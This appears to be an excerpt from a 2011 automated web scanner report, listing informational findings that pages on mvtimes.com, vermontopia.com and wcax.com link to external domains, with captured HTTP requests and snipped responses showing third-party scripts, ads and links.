10.191. http://www.mvtimes.com/marthas-vineyard/article.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/article.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /marthas-vineyard/article.php?id=4030 HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/marthas-vineyard/directory/?a=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=340f9a2f4e744e94e83d808165edd48d; __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.5.10.1302621734

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:17:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 31160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/general
...[SNIP]...
</a> | <a href="http://mvtimes.mycapture.com/mycapture/index.asp">Buy Photos</a>
...[SNIP]...
<div class="addthis_toolbox addthis_default_style" style="float:left;font-size:12px;line-height:16px;margin-left:100px;">
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=mvtimes" class="addthis_button_compact">Share</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mvtimes"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div id="rtCol">
<a href="http://www.mvbuyeragents.com/" onclick="javascript: pageTracker._trackPageview('/outgoing/mvbuyeragents.com--poster--home--ros');"><img src="/images/sda/300x250/MVBA-300x250.jpg" width="300" height="250" alt="MV Buyer Agents, Martha's Vineyard" /></a>
<a href="http://www.islandrealestatemv.com/index.php" onclick="javascript: pageTracker._trackPageview('/outgoing/www.islandrealestatemv.com/commercial--poster--home--ros');"><img src="/images/sda/300x250/island-re-rare-comm-edg.png" width="300" height="250" alt="Island Real Estate, Martha's Vineyard" /></a>
<a href="http://www.greenvineyard.net/" onclick="javascript: pageTracker._trackPageview('/outgoing/greenvineyard.net--poster--home--ros');"><img src="/images/sda/300x250/hgyv_300x250.jpg" width="300" height="250" alt="Green Vineyard, Martha's Vineyard" /></a>
<a href="http://www.chrystalangelini.com/" onclick="javascript: pageTracker._trackPageview('/outgoing/chrystalangelini.com--poster--home--ros');"><img src="/images/sda/300x250/Chrystal-Angelini_Apr.png" width="300" height="250" alt="Chrystal Angelini, Martha's Vineyard" /></a>
<a href="http://www.hobknobrealty.com/p.php/sales/privatelyoffered " onclick="javascript: pageTracker._trackPageview('/outgoing/hobknobrealty.com/p.php/sales/privatelyoffered --poster--home--ros');"><img src="/images/sda/300x250/HobKnob-Tilton.png" width="300" height="250" alt="Hob Knob Realty, Martha's Vineyard" /></a>
<a href="http://www.carolinetaylorproperties.com/vineyard_property_for_sale.html" onclick="javascript: pageTracker._trackPageview('/outgoing/carolinetaylorproperties.com--poster--home--ros');"><img src="/images/sda/300x250/caroline_taylor-a_JanesCove.png" width="300" height="250" alt="Caroline Taylor Properties, Martha's Vineyard" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<li><a href="http://mvtimes.mycapture.com/mycapture/index.asp">Buy Photos</a>
...[SNIP]...
10.192. http://www.mvtimes.com/marthas-vineyard/article.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/article.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /marthas-vineyard/article.php?id=4030 HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/marthas-vineyard/directory/?a=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=340f9a2f4e744e94e83d808165edd48d; __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.5.10.1302621734

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:17:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 30930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/general
...[SNIP]...
</a> | <a href="http://mvtimes.mycapture.com/mycapture/index.asp">Buy Photos</a>
...[SNIP]...
<div class="addthis_toolbox addthis_default_style" style="float:left;font-size:12px;line-height:16px;margin-left:100px;">
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=mvtimes" class="addthis_button_compact">Share</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mvtimes"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div id="rtCol">
<a href="http://www.mvbank.com/" onclick="javascript: pageTracker._trackPageview('/outgoing/mvbank.com--poster--home--ros');"><img src="/images/sda/300x250/8.27.jpg" width="300" height="250" alt="MV Savings Bank, Martha's Vineyard" /></a>
<a href="http://www.steamshipauthority.com/" onclick="javascript: pageTracker._trackPageview('/outgoing/steamshipauthority.com--poster--home--ros');"><img src="/images/sda/300x250/6.24.10.jpg" width="300" height="250" alt="Steamship Authority, Martha's Vineyard" /></a>
<a href="http://www.capeair.com/" onclick="javascript: pageTracker._trackPageview('/outgoing/capeair.com--poster--home--ros');"><img src="/images/sda/300x250/MV-Times-2011.jpg" width="300" height="250" alt="Cape Air, Martha's Vineyard" /></a>
<a href="http://www.chrystalangelini.com/" onclick="javascript: pageTracker._trackPageview('/outgoing/chrystalangelini.com--poster--home--ros');"><img src="/images/sda/300x250/Chrystal-Angelini_Apr.png" width="300" height="250" alt="Chrystal Angelini, Martha's Vineyard" /></a>
<a href="http://www.mvflorist.com/" onclick="javascript: pageTracker._trackPageview('/outgoing/mvflorist.com--poster--home--ros');"><img src="/images/sda/300x250/MVFlorist_MothersDay3.png" width="300" height="250" alt="MV Florist, Martha's Vineyard" /></a>
<a href="http://www.mvinsurance.com/" onclick="javascript: pageTracker._trackPageview('/outgoing/mvinsurance.com--poster--home--ros');"><img src="/images/sda/300x250/MV-Insurance.png" width="300" height="250" alt="MV Insurance, Martha's Vineyard" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<li><a href="http://mvtimes.mycapture.com/mycapture/index.asp">Buy Photos</a>
...[SNIP]...
10.193. http://www.mvtimes.com/marthas-vineyard/directory/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/directory/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /marthas-vineyard/directory/?a=1 HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/marthas-vineyard/on-island.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.4.10.1302621734

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:16:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=a8d8e35751186e367b10f53a8a6cfc62; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 25263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin template="/Templates/gene
...[SNIP]...
</a> | <a href="http://mvtimes.mycapture.com/mycapture/index.asp">Buy Photos</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div id="rtCol">
<a href="http://www.mvsharks.com/view/mvsharks/mv-sharks-headlines" onclick="javascript: pageTracker._trackPageview('/outgoing/mvsharks.com/buckner--poster--eat--drink');"><img src="/images/sda/300x250/MVSharks_BillBuckner75.png" width="300" height="250" alt="MV Sharks, Martha's Vineyard" /></a>
<a href="http://www.farminstitute.org/" onclick="javascript: pageTracker._trackPageview('/outgoing/farminstitute.org/CSA--poster--eat--drink');"><img src="/images/sda/300x250/Meat-&-Eggs.png" width="300" height="250" alt="Farm Institute, Martha's Vineyard" />
...[SNIP]...
<li><a href="http://mvtimes.mycapture.com/mycapture/index.asp">Buy Photos</a>
...[SNIP]...
10.194. http://www.vermontopia.com/event/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vermontopia.com
Path:   /event/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /event/?L=408799&referrerDomain=www.wcax.com HTTP/1.1
Host: www.vermontopia.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=408799
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a86813bdf156af37a69a3bdc7834aea8; __utmz=176143781.1302352254.1.1.utmcsr=wcax.com|utmccn=(referral)|utmcmd=referral|utmcct=/Global/category.asp; __utma=176143781.1407274445.1302352252.1302352252.1302352252.1; __utmc=176143781; __utmb=176143781.1.10.1302352252

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:31:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Content-Length: 23746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
</script>
       
       <script type="text/javascript" src="http://wcax.upickem.net/engine/includes/CountdownClock.js"></script>

                           <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<li id="TM8" ><a href="http://bit.ly/9EscRU" style="color: #f1991e; text-transform: uppercase">Daily Deal</a>
...[SNIP]...
</script>
                               <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
10.195. http://www.wcax.com/Global/category.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/category.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Global/category.asp?C=18196 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352164716:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: iis06
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: MEMORY
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 74664
Cache-Control: private, max-age=116
Date: Sat, 09 Apr 2011 12:30:47 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 74664

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Weather -
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
<link type="text/css" rel="stylesheet" media="all" href="http://content.worldnow.com/global/interface/container-e/core.css?ver=201011111600">
<link type="text/css" rel="stylesheet" media="all" href="http://WCAX.images.worldnow.com/interface/css/container-e.css?ver=2011-03-26%2003%3A55%3A56">
<!--[if lt IE 6]>
...[SNIP]...
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://content.worldnow.com/global/interface/integration/jquery.fancybox-1.3.1.css" media="screen">
<!--MENU INCLUDES-->
<link rel="stylesheet" href="http://content.worldnow.com/global/interface/menu/menu.css?ver=201011111600" type="text/css"><style type="text/css">
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<label for="WNSearchBox-headertop-google_cs">WEB SEARCH BY <img src='http://WCAX.images.worldnow.com/global/images/google/google-logo.gif' alt='Google' class='wnSearchBoxLabelImg-google'></label>
...[SNIP]...
<noscript><iframe id="WNLinksContent391987" name="WNLinksContent391987" class="wnLinksContentIframe" src="http://ftpcontent.worldnow.com/wcax/custom/branding_feature_i.html" width="100%" height="70" scrolling="no" frameborder="0" marginwidth="0" marginheight="0">[Your user agent does not support frames or is currently configured to not display frames. However, you may visit <a href="http://ftpcontent.worldnow.com/wcax/custom/branding_feature_i.html">the related document.</a>
...[SNIP]...
<!--END wnDS70-->
<img id="WNBrandingImage" usemap="#wnBrandingMap" alt="" border="0" onload="if (window.WNElement) WNElement.positionOver('WNDS70', 'WNBrandingImage', { horizontal : 'right', vertical : 'middle' });" src="http://WCAX.images.worldnow.com/images/static/hdr/hdr_branding.jpg"><map name="wnBrandingMap">
...[SNIP]...
<a href="/Global/category.asp?C=18195"><img src="http://WCAX.images.worldnow.com/images/272499_G.gif" width="37" height="29" border="0" alt="Home WCAX.com" title="Home WCAX.com" onsrc="http://WCAX.images.worldnow.com/images/272500_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18197"><img src="http://WCAX.images.worldnow.com/images/272501_G.gif" width="34" height="29" border="0" alt="Local News" title="Local News" onsrc="http://WCAX.images.worldnow.com/images/272502_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18196"><img src="http://WCAX.images.worldnow.com/images/272503_G.gif" width="54" height="29" border="0" alt="Weather" title="Weather" onsrc="http://WCAX.images.worldnow.com/images/272504_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18198"><img src="http://WCAX.images.worldnow.com/images/272505_G.gif" width="43" height="29" border="0" alt="Sports" title="Sports" onsrc="http://WCAX.images.worldnow.com/images/272506_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=408799"><img src="http://WCAX.images.worldnow.com/images/272508_G.gif" width="74" height="29" border="0" alt="WCAX Vermontopia Community Calendar" title="WCAX Vermontopia Community Calendar" onsrc="http://WCAX.images.worldnow.com/images/272509_G.gif"></a>
...[SNIP]...
<a href="javascript:OpenWin('http://www.vermontopia.com||height=768,width=1024,location=yes,resizable=yes,scrollbars=yes,toolbar=yes');"><img src="http://WCAX.images.worldnow.com/images/272510_G.gif" width="82" height="29" border="0" alt="Vermontopia.com" title="Vermontopia.com" onsrc="http://WCAX.images.worldnow.com/images/272511_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=398823"><img src="http://WCAX.images.worldnow.com/images/272512_G.gif" width="74" height="29" border="0" alt="WCAX Promotions" title="WCAX Promotions" onsrc="http://WCAX.images.worldnow.com/images/272513_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=68446"><img src="http://WCAX.images.worldnow.com/images/272514_G.gif" width="54" height="29" border="0" alt="LIFESTYLE" title="LIFESTYLE" onsrc="http://WCAX.images.worldnow.com/images/272516_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18836"><img src="http://WCAX.images.worldnow.com/images/272517_G.gif" width="60" height="29" border="0" alt="Contact Us" title="Contact Us" onsrc="http://WCAX.images.worldnow.com/images/272518_G.gif"></a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://www.worldnow.com/global/interface/jq.js"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/httprequest/httprequest.js"></script>
...[SNIP]...
</h4><img src="http://WCAX.images.worldnow.com/images/38205_G.gif" alt="Today's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/38198_G.gif" alt="Saturday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/38202_G.gif" alt="Sunday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/38202_G.gif" alt="Monday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/38202_G.gif" alt="Tuesday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/38205_G.gif" alt="Wednesday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_partlycloudy.gif" alt="Saturday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_cloudy.gif" alt="Sunday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_thunderstorms.gif" alt="Monday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_sunny.gif" alt="Tuesday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_sunny.gif" alt="Wednesday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_partlycloudy.gif" alt="Saturday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_rain.gif" alt="Sunday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_thunderstorms.gif" alt="Monday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_sunny.gif" alt="Tuesday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_sunny.gif" alt="Wednesday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_partlycloudy.gif" alt="Saturday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_cloudy.gif" alt="Sunday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_thunderstorms.gif" alt="Monday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_rain.gif" alt="Tuesday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_sunny.gif" alt="Wednesday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_partlycloudy.gif" alt="Saturday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_rain.gif" alt="Sunday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_thunderstorms.gif" alt="Monday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_sunny.gif" alt="Tuesday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_sunny.gif" alt="Wednesday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/pxl_trans.gif" alt="Saturday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_rain.gif" alt="Sunday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_thunderstorms.gif" alt="Monday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/pxl_trans.gif" alt="Tuesday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/pxl_trans.gif" alt="Wednesday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_partlycloudy.gif" alt="Saturday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_rain.gif" alt="Sunday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_thunderstorms.gif" alt="Monday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_sunny.gif" alt="Tuesday's Forecast Image"><ul>
...[SNIP]...
</h5><img src="http://WCAX.images.worldnow.com/images/static/gfx/wx_sunny.gif" alt="Wednesday's Forecast Image"><ul>
...[SNIP]...
<div class="wnDVUtilityBlock"><A HREF="http://wcax.mycapture.com/mycapture/photos/Album.aspx?EventID=1072176&CategoryID=63494"
            TARGET="_blank"><IMG
           

SRC="http://blackpearl.wcax.com/graphics/wcax/weather-ad.jpg"

WIDTH="645"
            BORDER="0" ALT="Click to Go to the Campaign 2008 Page">
...[SNIP]...
<a href="http://www.wcax.com/Global/story.asp?S=6330547"><img class="col2_3_ql_icon" src="http://WCAX.images.worldnow.com/images/272308_G.gif" /></a>
...[SNIP]...
<a href="http://www.wcax.com/Global/link.asp?L=47952"><img class="col2_3_ql_icon" src="http://WCAX.images.worldnow.com/images/272310_G.gif" /></a>
...[SNIP]...
<a href="http://www.wcax.com/Global/category.asp?C=76533"><img class="col2_3_ql_icon" src="http://WCAX.images.worldnow.com/images/272314_G.gif" /></a>
...[SNIP]...
<a href="http://www.wcax.com/Global/category.asp?C=120654&nav=menu183_3_2"><img class="col2_3_ql_icon" src="http://WCAX.images.worldnow.com/images/272312_G.gif" /></a>
...[SNIP]...
<a href="http://www.wcax.com/Global/category.asp?C=80035&nav=menu183_3_4"><img class="col2_3_ql_icon" src="http://WCAX.images.worldnow.com/images/272315_G.gif" /></a>
...[SNIP]...
<a href="http://www.wcax.com/Global/link.asp?L=257090&nav=menu183_2_7"><img class="col2_3_ql_icon" src="http://WCAX.images.worldnow.com/images/272316_G.gif" /></a>
...[SNIP]...
<div style="float:left;">
                       <a href="http://www.511vt.org"><img class="col2_3_ql_icon" src="http://WCAX.images.worldnow.com/images/272318_G.gif" /></a>
...[SNIP]...
<div class="col2_3_ql_link_text">
                           <a title="Road Conditions" style="font:bold 8pt Arial,Verdana,San-serif; color:#666666; line-height:11px;" href="http://www.511vt.com">Road Conditions</a>
...[SNIP]...
<div style="float:left;">
                       <a href="http://www.wcax.worldnow.com/global/Category.asp?c=176269"><img class="col2_3_ql_icon" src="http://WCAX.images.worldnow.com/images/309858_G.gif" /></a>
...[SNIP]...
<a href="http://www.wcax.com/global/link.asp?L=445290"><img class="col2_3_ql_icon" src="http://WCAX.images.worldnow.com/images/272313_G.gif" /></a>
...[SNIP]...
<div style="float:left;">
                       <a href="http://twitter.com/wcaxweather"><img class="col2_3_ql_icon" src="http://WCAX.images.worldnow.com/images/272319_G.gif" /></a>
...[SNIP]...
<div class="col2_3_ql_link_text">
                           <a title="Twitter" style="font:bold 8pt Arial,Verdana,San-serif; color:#666666; line-height:11px;" href="http://twitter.com/wcaxweather">Twitter</a>
...[SNIP]...
<a title="Active Storm Warnings" href="http://www.wcax.com/Global/link.asp?L=394983"><img class="aw_img" src="http://wcax.images.worldnow.com/images/incoming/WEB_warnings.jpg" /></a>
...[SNIP]...
<div class="wnDVUtilityBlock"><iframe src="http://www.facebook.com/plugins/likebox.php?id=140859045441&amp;width=292&amp;connections=10&amp;stream=true&amp;header=true&amp;height=587" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:292px; height:587px;" allowTransparency="true"></iframe></div><div class="wnDVUtilityBlock"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div id="WNCopyright"><a href="http://www.worldnow.com" target="_blank"><img src="http://WCAX.images.worldnow.com/images/static/container-e/wn_powerby.gif" alt="Powered by WorldNow" border="0"></a>
...[SNIP]...
<noscript><img src="http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.0&amp;WT.sp=WCAX&amp;dcssip=www.wcax.com" name="DCSIMG" width="1" height="1" border="0" alt=""></noscript>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
10.196. http://www.wcax.com/Global/category.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/category.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Global/category.asp?C=18197 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352442619:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
wn: iis14
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: MEMORY
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 91623
Cache-Control: private, max-age=300
Date: Sat, 09 Apr 2011 12:34:13 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 91623

